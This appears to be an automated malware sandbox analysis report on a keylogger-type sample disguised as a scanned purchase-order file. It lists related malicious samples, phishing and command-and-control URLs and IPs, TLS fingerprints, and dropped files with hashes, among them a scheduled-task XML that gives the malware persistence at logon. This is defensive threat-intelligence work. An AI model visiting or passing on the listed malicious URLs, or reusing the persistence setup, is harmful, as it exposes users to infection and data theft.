                                                                                                      • www.freedietbuilder.online/nnla/
                                                                                                      http://onlinecheapflights.net/Get hashmaliciousUnknownBrowse
                                                                                                      • onlinecheapflights.net/
                                                                                                      Technical Datasheet and Specification_PDF.exeGet hashmaliciousUnknownBrowse
                                                                                                      • www.rihanaroly.sbs/othk/?0dk=RykyQ3QZ+r1dqZwhAQupYMuQy26h2PYi8Fyfl3RAfHSVFgYOfXbCDUNV+aNHe22U393WzLygMMdANTa+vksg1hx1LENxGTGsZa2bATkiGgfiS6KvHA==&urk=NXuT
                                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                      • www.ergeneescortg.xyz/guou/
                                                                                                      Halkbank_Ekstre_20230426_075819_154055.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.thetahostthe.top/9r5x/
                                                                                                      http://comodozeropoint.com/updates/1736162964/N1/Team.exeGet hashmaliciousUnknownBrowse
                                                                                                      • comodozeropoint.com/updates/1736162964/N1/Team.exe
                                                                                                      SecuriteInfo.com.Win32.MalwareX-gen.14607.6011.exeGet hashmaliciousUnknownBrowse
                                                                                                      • servicetelemetryserver.shop/api/index.php
                                                                                                      193.122.130.0REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      rp8s2rxD5lpuQAG.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      Pedido urgente_pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      greatthingswithgreatideasgivenmerestthignstgood.htaGet hashmaliciousCobalt Strike, Snake KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/
                                                                                                      NEW ORDER QUOTATION REQUEST.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • checkip.dyndns.org/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      reallyfreegeoip.orgQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 104.21.67.152
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.96.3
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      checkip.dyndns.comQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 132.226.247.73
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 132.226.8.169
                                                                                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 193.122.6.168
                                                                                                      api.telegram.orgQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      TELEGRAMRUQuote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 149.154.167.220
                                                                                                      kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 149.154.167.220
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Produccion.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      226999705-124613-sanlccjavap0004-67.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      BT-036016002U_RFQ 014-010-02024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Circular_no_088_Annexure_pdf.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 149.154.167.220
                                                                                                      CLOUDFLARENETUSScan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      https://t.ly/BavariaFilmGmbH2410Get hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.3
                                                                                                      Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.96.3
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 162.159.138.232
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 162.159.128.233
                                                                                                      lUAc7lqa56.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.0.5
                                                                                                      https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                                                                                      • 104.18.90.62
                                                                                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.18.91.123
                                                                                                      la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 104.22.149.180
                                                                                                      Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.97.3
                                                                                                      RELIABLESITEUShttp://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                                                                      • 104.194.8.184
                                                                                                      SecuriteInfo.com.BScope.Trojan.Agentb.20481.11202.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 103.195.103.66
                                                                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                      • 185.150.191.117
                                                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.16.151.108
                                                                                                      20240930_185453_p1uYhraXAa8FqoQDzs1lqwv0Fp3NVQrL.emlGet hashmaliciousGRQ ScamBrowse
                                                                                                      • 104.238.220.6
                                                                                                      https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
                                                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 45.126.216.243
                                                                                                      x86.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 154.16.151.105
                                                                                                      https://oaemk-f29f.hmnaitswiaa.workers.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
                                                                                                      http://sanjaygowda23.github.io/netflix-homepageGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.194.8.184
                                                                                                      ORACLE-BMC-31898USla.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 140.238.246.224
                                                                                                      la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 130.35.12.1
                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 168.138.244.186
                                                                                                      la.bot.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 130.61.64.122
                                                                                                      la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 140.238.158.19
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 158.101.44.242
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 193.122.6.168
                                                                                                      REVISED INVOICE.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 193.122.130.0
                                                                                                      botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                      • 140.238.98.34

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adScan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      22390016593_20210618_14375054_HesapOzeti.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      g1TLK7mbZD.imgGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      EKSTRE_1022.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Purchase Order.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Halkbank_Ekstre_20241022_081224_563756.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      SIPARIS-290124.PDF.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      Renommxterne.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      PAYMENT ADVISE MT107647545.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eScan_Rev 20220731_PO&OC#88SU7782743882874_PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      copia de pago____xls.exeGet hashmaliciousDarkCloudBrowse
                                                                                                      • 149.154.167.220
                                                                                                      Quote1.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                      • 149.154.167.220
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      runtime.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      https://temp.farenheit.net/XL1VkZE1FVGZjL0VwUUt5cWc4dkk1SWpqVFFTMUtQZ0krRFhobktOS05RSWpVMTZIYzk3b3hOUTBoZ2VYdnAzM21wZnYwMVBmdGN0MW12M09qVmMzbnNVeVpkeXBxeHVGd2V4eDRvVlZ5dERsakpjbGV3ZVZxRVhlZ0F6Q3hwQlptYUUyRFhHRzY3YkRXQ3hjWmhBZDBpMkNpakJDSnhzUG9xa2k2ZkdacVpDZVhFVFppeUJLcHJIaC0teVVJeERBTFd0K3k3b01rYS0tRk9zSWNIVEd0blVHZVlhTlFnVUxldz09?cid=2242420613Get hashmaliciousUnknownBrowse
                                                                                                      • 149.154.167.220
                                                                                                      nicegirlwithnewthingswhichevennobodknowthatkissingme.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                      • 149.154.167.220
                                                                                                      #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                      • 149.154.167.220
                                                                                                      EXSP 5634 HISP9005 ST MSDS DOKUME74247liniereletOpsistype.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                      • 149.154.167.220
                                                                                                      QYP0tD7z0c.exeGet hashmaliciousDCRatBrowse
                                                                                                      • 149.154.167.220

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HJnkiZjAPsec.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1415
                                                                                                      Entropy (8bit):5.352427679901606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                                      MD5:3978978DE913FD1C068312697D6E5917
                                                                                                      SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                                      SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                                      SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                                      Malicious:false
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1415
                                                                                                      Entropy (8bit):5.352427679901606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRuAE4KzecKIE4oKNzKorE4x84j:MIHK5HKH1qHiYHKh3oPHKMRuAHKzectP
                                                                                                      MD5:3978978DE913FD1C068312697D6E5917
                                                                                                      SHA1:1DABBE7FB8F38F6EBF474CE5F0ECAA89F48E2538
                                                                                                      SHA-256:33B7B1668DDD3AB39711F9F93B667F6F2F674348A79228BFA163BA625B37F120
                                                                                                      SHA-512:78694B97F5D03758F503155E5CE5B85AABDF9690F0DFBC51FCE9926BE2D86BCF99E008659420F1E8489A7F6EA125F2776D4C6DC4B151566B529454512352953D
                                                                                                      Malicious:true
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll"

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.379677338874509
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//MPUyus:tLHxvIIwLgZ2KRHWLOugss
                                                                                                      MD5:EC88D19932BD09E055925B18791E48FB
                                                                                                      SHA1:AE33B55A24121EF5EAF45CE70F20D046E80D7375
                                                                                                      SHA-256:871612889ACB1697FAD69F6387EE3423C7BD8AAB6776DB9AB765965C48192B80
                                                                                                      SHA-512:1770E81F5D8017B0E17BFA03A567BFA1EEE45B18EB2E448DC2E5FD51EA92B5432B817F78AB66AC0E546663676499AA61797A72EE27204497C62B32FB73BDCAAE
                                                                                                      Malicious:false
                                                                                                      Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqcx0lfj.plp.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jfvikkux.lpe.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wu4lludl.4lu.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zygjjui0.t3g.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\tmpB8C6.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exe
                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.112783275053078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTQv
                                                                                                      MD5:E4BEA43D2518D4DC26A5FDAD6B972E63
                                                                                                      SHA1:C5772AE19C34A9967077B63365AD3D63148953F8
                                                                                                      SHA-256:A15CACA6172EFA881C0FA87E838F9EC4BB60B57A275762E83FB89FEA7A01C11C
                                                                                                      SHA-512:2E74612D1897383EDF743B0B86DACEC6435A35509F777284749C7D8146587560B8454599D0ADFE83F797664B4C4CC3078844AB347633DA8E52826192F2364CFF
                                                                                                      Malicious:true
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                                      C:\Users\user\AppData\Local\Temp\tmpCB45.tmp

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Roaming\HJnkiZjAPsec.exe
                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1578
                                                                                                      Entropy (8bit):5.112783275053078
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtaxVxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTQv
                                                                                                      MD5:E4BEA43D2518D4DC26A5FDAD6B972E63
                                                                                                      SHA1:C5772AE19C34A9967077B63365AD3D63148953F8
                                                                                                      SHA-256:A15CACA6172EFA881C0FA87E838F9EC4BB60B57A275762E83FB89FEA7A01C11C
                                                                                                      SHA-512:2E74612D1897383EDF743B0B86DACEC6435A35509F777284749C7D8146587560B8454599D0ADFE83F797664B4C4CC3078844AB347633DA8E52826192F2364CFF
                                                                                                      Malicious:false
